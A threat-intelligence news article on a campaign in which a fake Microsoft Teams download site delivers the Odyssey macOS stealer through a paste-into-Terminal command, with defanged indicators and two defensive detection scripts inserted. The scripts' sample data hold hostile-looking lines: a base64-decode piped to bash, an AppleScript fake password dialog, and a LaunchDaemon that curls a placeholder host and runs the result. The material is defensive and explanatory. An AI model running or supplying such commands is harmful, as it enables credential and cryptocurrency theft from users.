Hackers Exploit Fake Microsoft Teams Site to Spread Odyssey macOS Stealer

Cybercriminals have escalated their attacks against macOS users by deploying a sophisticated new campaign that leverages a fraudulent Microsoft Teams download site to distribute the dangerous Odyssey stealer malware.

This development represents a significant evolution from earlier attacks that primarily targeted users through fake trading platforms.

The malicious campaign first came to light in early August 2025 when security researchers at Forcepoint documented attacks using fake TradingView sites to deliver the Odyssey stealer.

However, recent infrastructure analysis by CloudSEK’s threat intelligence platform TRIAD has revealed that the same threat actors have expanded their operations to impersonate Microsoft Teams, one of the world’s most widely used collaboration platforms.

The attackers have registered the domain teamsonsoft[.]com to host their fraudulent Microsoft Teams download page, complete with official Microsoft branding and logos to deceive unsuspecting victims.

Through advanced threat hunting techniques, researchers identified 24 unique IP addresses belonging to the same malicious infrastructure cluster, indicating the substantial scale of this operation.

The attack follows a sophisticated “clickfix” methodology that exploits user trust in legitimate software.

When victims visit the fake Microsoft Teams site and attempt to download what they believe is the official application, they are instead presented with a command to copy and paste into their Terminal application.

Landing page – teamsonsoft[.]com.

For macOS users, this copied command contains a base64-encoded payload that, when decoded and executed, launches a comprehensive AppleScript-based stealer.

The malware operates with surgical precision, systematically harvesting sensitive data from infected systems without requiring any software exploits; it relies instead on legitimate system functions and built-in scripting, which helps it avoid detection.

Comprehensive Data Theft Capabilities

The Odyssey stealer demonstrates alarming sophistication in its data collection capabilities. The malware targets multiple categories of sensitive information, beginning with system reconnaissance through the system_profiler utility to gather hardware and software details about the infected machine.

The stealer specifically focuses on credential theft, attempting to access Chrome keychain items and implementing a persistent authentication loop that presents fake system dialogs requesting the user’s device password.

This social engineering tactic ensures the malware obtains the elevated privileges necessary for its more invasive operations.
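Two behaviours described above are visible on the endpoint without any signature for the malware itself: the "clickfix" step, where a base64 blob is decoded in Terminal and piped straight into a shell, and the fake password prompt, which on macOS is typically an `osascript` call using AppleScript's `display dialog ... with hidden answer`. The following detection logic is an added example written for this article, not code from the campaign, from CloudSEK or from Forcepoint. It runs over a small constructed list of process-execution records (parent process plus command line, the fields most EDR or unified-log collectors expose); the records, the rule names and the regular expressions are assumptions chosen for illustration, and the encoded sample is a harmless dialog command built at import time.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed sample, not a real observed command: a benign AppleScript line
# encoded the same way a clickfix page would encode its real payload.
_DECODED_SAMPLE = "osascript -e 'display dialog \"Hi\"'"
_BLOB = base64.b64encode(_DECODED_SAMPLE.encode()).decode()

# Constructed process-execution records (hypothetical EDR export format).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "Terminal", "cmd": "ls -la /Applications"},
    # clickfix pattern: decode a blob and hand the result to a shell
    {"parent": "Terminal", "cmd": f"echo {_BLOB} | base64 -d | bash"},
    # fake "system" password dialog driven by AppleScript
    {"parent": "bash",
     "cmd": "osascript -e 'display dialog \"System requires your password\" "
            "default answer \"\" with hidden answer'"},
    # ordinary installer activity that must not be flagged
    {"parent": "Installer", "cmd": "/usr/bin/installer -pkg /tmp/Teams.pkg -target /"},
]

# A decoder followed by a pipe into an interpreter is the core clickfix shape.
B64_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")
SHELL_SINK = re.compile(r"\|\s*(?:ba|z)?sh\b|\|\s*osascript\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# AppleScript password prompt: hidden-answer dialogs are rare in legitimate shells.
HIDDEN_ANSWER = re.compile(r"osascript.*display dialog.*hidden answer", re.S)


def _decode_blobs(cmd: str) -> Optional[str]:
    """Return the first base64 run in cmd that decodes to printable text."""
    for match in B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            return text
    return None


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, Optional[str]]]:
    """Apply both rules to each record; findings carry the decoded payload so an
    analyst sees what would have run without executing anything."""
    findings: List[Dict[str, Optional[str]]] = []
    for event in events:
        cmd = event["cmd"]
        if B64_DECODE.search(cmd) and SHELL_SINK.search(cmd):
            findings.append({"rule": "clickfix_base64_to_shell",
                             "parent": event["parent"], "cmd": cmd,
                             "decoded": _decode_blobs(cmd)})
        if HIDDEN_ANSWER.search(cmd):
            findings.append({"rule": "applescript_password_prompt",
                             "parent": event["parent"], "cmd": cmd,
                             "decoded": None})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["rule"], "<-", finding["cmd"])
        if finding["decoded"]:
            print("   decoded payload:", finding["decoded"])
```

Decoding the blob in the alert, rather than only matching on the pipe, is what makes the finding actionable: the responder sees the AppleScript or download command the victim was about to run, and the second rule catches the credential prompt even when the initial command was typed by hand and never logged.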

Perhaps most concerning is the malware’s comprehensive targeting of cryptocurrency assets.

The stealer methodically searches for and copies data from dozens of cryptocurrency wallets and browser extensions, including popular platforms like MetaMask, Electrum, Exodus, Coinomi, and hardware wallet applications such as Ledger Live and Trezor Suite.

The malware also harvests browser cookies, saved passwords, form data, and even Apple Notes databases.

Beyond data theft, the Odyssey stealer implements multiple persistence mechanisms to maintain long-term access to compromised systems.

The malware downloads additional payloads from its command-and-control server and establishes persistence through LaunchDaemons, ensuring it continues operating even after system restarts.
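LaunchDaemon persistence leaves a property list on disk, which makes it one of the easier stages to audit. The script below is an added example, not the campaign's own artefacts or any vendor's tooling: it writes three constructed plists (one benign-looking, two shaped like the persistence the article describes) to a temporary directory, then parses each with `plistlib` and flags entries that run from user-writable or hidden locations, or that launch a shell interpreter with an inline script containing a download or decode tool. The file names, labels, paths and the `c2.example.invalid` host are placeholders, and the heuristics are assumptions to be tuned against a fleet's own baseline. Point `audit_launch_daemons` at `/Library/LaunchDaemons` to run it for real.

```python
import plistlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Assumed baseline: legitimate daemons rarely execute from these prefixes.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                     "/var/folders/", "/private/var/folders/", "/Users/")
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python3", "/usr/bin/perl"}
DOWNLOAD_MARKERS = ("curl ", "wget ", "base64 ", "osascript")

# Constructed sample daemons (placeholders, not real files from the campaign).
SAMPLE_PLISTS: Dict[str, dict] = {
    "com.example.helper.plist": {            # plausible vendor daemon, system path
        "Label": "com.example.helper",
        "ProgramArguments": ["/usr/libexec/example-helper", "--daemon"],
        "RunAtLoad": True,
    },
    "com.update.agent.plist": {              # shell -c wrapper that fetches a stage
        "Label": "com.update.agent",
        "ProgramArguments": ["/bin/sh", "-c",
                             "curl -fsSL http://c2.example.invalid/u -o /tmp/u && sh /tmp/u"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "com.cache.service.plist": {             # hidden binary under /private/tmp
        "Label": "com.cache.service",
        "Program": "/private/tmp/.cache/service",
        "RunAtLoad": True,
    },
}


def write_samples(target: Path) -> None:
    """Write the constructed plists so the audit reads real files from disk."""
    target.mkdir(parents=True, exist_ok=True)
    for name, content in SAMPLE_PLISTS.items():
        with open(target / name, "wb") as fh:
            plistlib.dump(content, fh)


def _program_and_args(item: dict) -> List[str]:
    # launchd accepts either Program or ProgramArguments; normalise to a list.
    args = item.get("ProgramArguments") or []
    if not args and item.get("Program"):
        args = [item["Program"]]
    return [str(a) for a in args]


def inspect_daemon(item: dict) -> List[str]:
    """Return human-readable reasons this daemon deserves a second look."""
    reasons: List[str] = []
    args = _program_and_args(item)
    if not args:
        return ["no Program or ProgramArguments"]
    program = args[0]
    if program.startswith(WRITABLE_PREFIXES):
        reasons.append(f"runs from user-writable location: {program}")
    if any(part.startswith(".") for part in Path(program).parts):
        reasons.append(f"hidden path component in: {program}")
    if program in INTERPRETERS and "-c" in args:
        script = " ".join(args[args.index("-c") + 1:])
        if any(marker in script for marker in DOWNLOAD_MARKERS):
            reasons.append(f"interpreter runs inline script with download/decode tool: {script}")
    if reasons and item.get("RunAtLoad") and item.get("KeepAlive"):
        reasons.append("RunAtLoad and KeepAlive set alongside other indicators")
    return reasons


def audit_launch_daemons(directory: Path) -> Dict[str, List[str]]:
    """Parse every *.plist in directory and map flagged file names to reasons."""
    flagged: Dict[str, List[str]] = {}
    for plist_path in sorted(directory.glob("*.plist")):
        with open(plist_path, "rb") as fh:
            try:
                item = plistlib.load(fh)
            except plistlib.InvalidFileException:
                flagged[plist_path.name] = ["unparseable plist"]
                continue
        reasons = inspect_daemon(item)
        if reasons:
            flagged[plist_path.name] = reasons
    return flagged


def run_demo() -> Dict[str, List[str]]:
    """Write the samples to a scratch directory and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        daemons_dir = Path(tmp) / "LaunchDaemons"
        write_samples(daemons_dir)
        return audit_launch_daemons(daemons_dir)


if __name__ == "__main__":
    for name, reasons in run_demo().items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

The audit is deliberately path- and shape-based rather than label-based, because a label like `com.update.agent` is cheap for an attacker to change; the same checks apply unchanged to `/Library/LaunchAgents` and the per-user `~/Library/LaunchAgents` directories.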

In a particularly devious move, the malware completely replaces legitimate Ledger Live applications with trojanized versions downloaded from the attacker’s infrastructure.

This replacement strategy allows criminals to intercept cryptocurrency transactions and potentially steal digital assets directly from users’ hardware wallets.

All stolen data is compressed into a ZIP archive stored in the system’s temporary directory before being exfiltrated to the attacker’s command-and-control server at IP address 185.93.89[.]62.

The same infrastructure hosts additional malicious payloads and even maintains a login panel for the Odyssey stealer operation.

After successful data transmission, the malware attempts to clean up evidence by removing temporary files and working directories, making forensic analysis more challenging for security researchers and incident response teams.

Implications and Recommendations

This campaign represents a concerning trend of increasingly sophisticated attacks targeting macOS users, who historically faced fewer malware threats than Windows users.

The combination of social engineering through trusted brand impersonation and advanced evasion techniques makes these attacks particularly dangerous.

Users should exercise extreme caution when downloading software, always verifying they are accessing official vendor websites and avoiding copy-paste installation commands from unfamiliar sources.

Organizations should implement comprehensive endpoint detection and response solutions capable of identifying suspicious AppleScript execution and unusual data access patterns.

The evolution from TradingView impersonation to Microsoft Teams targeting suggests these threat actors will continue adapting their tactics to exploit popular platforms and services, making ongoing vigilance essential for both individual users and enterprise security teams.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.